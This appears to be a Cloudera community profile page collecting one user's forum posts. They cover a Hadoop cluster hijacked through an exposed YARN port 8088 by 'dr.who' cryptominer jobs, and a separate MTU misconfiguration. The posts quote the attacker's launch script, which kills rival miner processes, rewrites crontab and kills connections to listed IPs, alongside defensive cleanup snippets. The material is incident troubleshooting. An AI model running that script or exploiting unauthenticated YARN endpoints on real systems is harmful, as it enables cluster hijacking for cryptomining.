Member since: 05-02-2016
Posts: 19
Kudos Received: 1
Solutions: 1

My Accepted Solutions

Title | Views | Posted
---|---|---
| 4469 | 08-16-2018 02:43 PM |
08-17-2018 07:03 AM

Confirmed, this was the issue. Blocking outside traffic to port 8088 at the firewall kept it from happening again, along with removing the rogue entry from the yarn user's crontab and killing the leftover yarn processes.

Chris
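For anyone doing the same cleanup, the crontab step can be sketched like this. The sample crontab content below is hypothetical (modeled on the `/var/tmp/java -c /var/tmp/w.conf` process from this thread), and the pattern simply drops any line referencing /var/tmp:

```shell
# Hypothetical crontab content modeled on the rogue entry seen in this thread.
sample='* * * * * /var/tmp/java -c /var/tmp/w.conf
30 2 * * * /usr/sbin/logrotate /etc/logrotate.conf'

# Delete any line referencing /var/tmp. In practice you would read the real
# table with `crontab -l -u yarn` and reinstall the cleaned result with
# `crontab -u yarn -` (as root).
cleaned=$(printf '%s\n' "$sample" | sed '\|/var/tmp|d')
printf '%s\n' "$cleaned"
```

The `\|...|d` form is a sed address with `|` as the delimiter, which avoids escaping the slashes in the path.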
08-16-2018 02:43 PM

Yup, looks like this is the culprit: https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html

I found an entry in the security group that needed updating. I'm thinking this will fix the problem. I'll post back one more time with a confirmation.
08-16-2018 02:33 PM

More info: I found this: https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html which describes exactly what is happening to me. Apparently my Security Groups in AWS need to be tightened somehow? I'm not sure how this is happening... yet.
08-16-2018 02:15 PM

Sorry, I should have also mentioned that I did verify that port 2049 is not blocked at the firewall with the unix "nc" command. Also, interestingly enough, even after stopping the YARN service in CM, the jobs kept spawning. I inspected the process that's running, and it's an odd one (to me):

yarn 28333 1 99 19:59 ? 09:47:22 /var/tmp/java -c /var/tmp/w.conf

I don't know why there is a "java" in /var/tmp, and there was no "w.conf" file there either. The mystery continues...
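A quick way to pull the PID of anything executing out of /var/tmp so it can be killed. The ps line below is copied from the output above; with live output you would pipe `ps -ef` in and finish with `| xargs kill -9`:

```shell
# Sample line mirroring the rogue process observed above (ps -ef style fields:
# user, pid, ppid, cpu, start, tty, time, command).
ps_line='yarn 28333 1 99 19:59 ? 09:47:22 /var/tmp/java -c /var/tmp/w.conf'

# Print the PID of any process whose command lives under /var/tmp.
pid=$(printf '%s\n' "$ps_line" | awk '$8 ~ /^\/var\/tmp\// {print $2}')
printf '%s\n' "$pid"
```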
08-16-2018 02:07 PM

Hi everyone,

I'm fairly familiar with Cloudera Hadoop, but this one is stumping me. I installed a fresh copy of CM 5.15.0 on newly provisioned hardware today:

Version: Cloudera Express 5.15.0
Java VM Name: Java HotSpot(TM) 64-Bit Server VM
Java VM Vendor: Oracle Corporation
Java Version: 1.7.0_67

It's running CDH5 version: 5.15.0-1.cdh5.15.0.p0.21

When I spun up the cluster, I noticed that the Cluster CPU was pegged at 100%. Odd, since nothing should be running here yet. A quick look at "top" on the datanodes showed yarn processes on each taking tons of CPU:

top - 20:57:28 up 3:20, 1 user, load average: 39.26, 39.38, 38.46
Tasks: 408 total, 1 running, 407 sleeping, 0 stopped, 0 zombie
Cpu(s): 28.6%us, 0.2%sy, 0.0%ni, 71.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 30794896k total, 4898532k used, 25896364k free, 123248k buffers
Swap: 0k total, 0k used, 0k free, 2963828k cached

  PID USER PR NI VIRT RES SHR S  %CPU %MEM    TIME+ COMMAND
26355 yarn 20  0 391m 27m 584 S 549.0  0.1 303:19.37 java
26273 yarn 20  0 391m 27m 588 S 515.6  0.1 303:23.67 java
26313 yarn 20  0 391m 27m 584 S 512.9  0.1 303:33.08 java

These are 16-core servers, so a load average of 39.26 is crazy high. I then checked the YARN -> Applications tab in CM, and there are ~40 jobs a minute being spawned and failing with this info:

ID: application_1534449578775_0528
Type: YARN
User: dr.who
Pool: root.users.dr_dot_who
Duration: 25.9s
Allocated Memory Seconds: 10.5K
Allocated VCore Seconds: 10

Every one of them has this error under "Application Details":

=================================================================
Application application_1534449578775_0528 failed 2 times due to AM Container for appattempt_1534449578775_0528_000002 exited with exitCode: 123
For more detailed output, check application tracking page: http://bddevh01.dbhotelcloud.com:8088/proxy/application_1534449578775_0528/ Then, click on links to logs of each attempt.
Diagnostics: Exception from container-launch.
Container id: container_1534449578775_0528_02_000001
Exit code: 123
Exception message: bash: no job control in this shell
bash-4.1$ for i in {1..60}; do ps ax|grep ff.sh|awk '{print $1}'|xargs ps -o ppid=|xargs kill -9; done;pgrep -f "sh \./a[[:digit:]]{1,}$"|xargs kill -9;ps ax|grep "./no1\|sssshd\|terty\|asdfsd\|qwefdas\|piois"|grep -v grep | awk '{print $1}' | xargs kill -9;ps ax|grep "./uiiu"|grep -v grep | awk '{print $1}' | xargs kill -9;ps ax|grep "./noda\|./manager"|grep sh|grep -v grep | awk '{print $1}' | xargs kill -9;ps ax|grep "./noss"|grep -v grep | awk '{print $1}' | xargs kill -9;crontab -l | sed '/tmp/d' | crontab -;crontab -l | sed '/jpg/d' | crontab -;crontab -l | sed '/png/d' | crontab -;netstat -antp | grep '158.69.133.20\|192.99.142.249\|202.144.193.110\|192.99.142.225\|192.99.142.246\|46.4.200.177\|192.99.142.250\|46.4.200.179\|192.99.142.251\|46.4.200.178\|159.65.202.177\|185.92.223.190\|222.187.232.9' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
usage: kill [ -s signal | -p ] [ -a ] pid ...
       kill -l [ signal ]
<snip: the usage message repeats many times>
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
usage: kill [ -s signal | -p ] [ -a ] pid ...
       kill -l [ signal ]
bash-4.1$ exit
at org.apache.hadoop.util.Shell.runCommand(Shell.java:604)
at org.apache.hadoop.util.Shell.run(Shell.java:507)
at org.apache.hadoop.util.Shell$ShellCommandExecutor.execute(Shell.java:789)
at org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor.launchContainer(DefaultContainerExecutor.java:213)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:302)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:82)
at java.util.concurrent.FutureTask.run(FutureTask.java:262)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:745)
Container exited with a non-zero exit code 123
Failing this attempt. Failing the application.
=================================================================

Does anyone know what this job is, or why it is getting this exception:

Exception message: bash: no job control in this shell

I've googled that error, but the results haven't led me in a direction where I can determine the root cause. Thank you SO MUCH for your time and suggestions...

Chris
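On the exitCode 123 itself: YARN's container executor just surfaces the exit status of the launch script it ran, so 123 is whatever the payload's last command returned, not a YARN-specific error code (and "no job control in this shell" is a routine warning from a non-interactive bash, not the failure itself). A minimal illustration of that propagation:

```shell
# The container executor reports the launched script's own exit status;
# a script whose last command fails propagates that command's code.
sh -c 'exit 123'
code=$?
printf '%s\n' "$code"
```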
Labels:
- Apache YARN
- Cloudera Manager
05-07-2016 11:39 AM

Just one last reply to confirm that an improper switch configuration was the issue here. Once that was fixed, everything worked great! Thanks again for all the help.

Chris
05-03-2016 05:33 PM

Well, it seems the network guy has gone home for the day, so I set all the MTUs to 1500 between the CM server host and one agent server, and everything is working great. 🙂 🙂

Michalis, thank you again for taking the time to read my extra-long posts and get me past this issue. I'll have the network guy check the switch and firewall configuration tomorrow and find out where the problem is ASAP. I'll post back one more time with whatever the final issue turns out to be. Thanks again.

Chris
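For reference, dropping an interface to a standard MTU at runtime is a one-liner with iproute2 (the interface name bond0 is taken from the ifconfig output elsewhere in this thread; making the change survive a reboot belongs in the distro's network config files):

```shell
# Temporarily set bond0 to a 1500-byte MTU (runtime only; requires root).
ip link set dev bond0 mtu 1500
```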
05-03-2016 02:57 PM

Ahhh... I think you are on to something for sure! </happy_dance>

chris.neal@bdprodm09:[65]:~> ping -M do -s 8972 172.0.30.2
PING 172.0.30.2 (172.0.30.2) 8972(9000) bytes of data.
^C
--- 172.0.30.2 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1574ms

I'm going to ping our network guy and have him validate the switch configurations. Thank you thank you thank you. 🙂 I'll report back soon, I hope!

Chris
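Why `-s 8972` rather than 9000: ping's `-s` sets the ICMP payload size, which excludes the 20-byte IPv4 header and the 8-byte ICMP echo header, which is also why the output reads "8972(9000)". The arithmetic:

```shell
mtu=9000
ip_header=20    # IPv4 header with no options
icmp_header=8   # ICMP echo header
payload=$((mtu - ip_header - icmp_header))
printf '%s\n' "$payload"   # largest -s value that still fits a 9000-byte MTU
```

With `-M do` (don't fragment) set, any switch in the path still configured for a 1500-byte MTU has to drop these packets, which matches the 100% loss above.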
05-03-2016 02:28 PM

Thanks again 🙂 It's a bonded 4x10Gb with an MTU of 9000.

bond0     Link encap:Ethernet  HWaddr A0:36:9F:96:76:F4
          inet addr:172.0.30.2  Bcast:172.0.30.255  Mask:255.255.255.0
          inet6 addr: fe80::a236:9fff:fe96:76f4/64 Scope:Link
          UP BROADCAST RUNNING MASTER MULTICAST  MTU:9000  Metric:1
          RX packets:8750 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1500 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:616956 (602.4 KiB)  TX bytes:259076 (253.0 KiB)

Chris
05-03-2016 01:55 PM

Thanks for the reply Michalis! /tmp is 777:

root@bdprodm10:[134]:/tmp> ls -la
total 203756
drwxrwxrwt. 14 root root 4096 May 3 20:41 .

I noticed on a working CM install that the next step in the install process is a CHMOD step that I never reach, because the COPY step never completes. I think that is why the permissions are 644 on the .sh file, and 700 on the directory itself:

root@bdprodm10:[136]:/tmp> ls -l | grep scm_prepare_node.mWfGt4sr
drwx------ 2 cminstall cminstall 4096 May 3 20:22 scm_prepare_node.mWfGt4sr
root@bdprodm10:[137]:/tmp> ls -l scm_prepare_node.mWfGt4sr
total 0
-rw-r--r-- 1 cminstall cminstall 0 May 3 20:22 scm_prepare_node.sh

Again, thank you for your help!
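The intermediate state described above (a 700 directory holding a 644, zero-byte script) can be reproduced in a throwaway directory to see the same modes; the names here are stand-ins for the real /tmp/scm_prepare_node.* paths:

```shell
# Stand-in for /tmp/scm_prepare_node.XXXX as the installer leaves it when
# the COPY step stalls before the later CHMOD step ever runs.
workdir=$(mktemp -d)
chmod 700 "$workdir"                   # drwx------ on the staging directory
: > "$workdir/scm_prepare_node.sh"     # empty file: the copy never completed
chmod 644 "$workdir/scm_prepare_node.sh"   # -rw-r--r--, not yet executable
stat -c '%a' "$workdir" "$workdir/scm_prepare_node.sh"
```

(`stat -c '%a'` is the GNU coreutils form for printing octal permissions.)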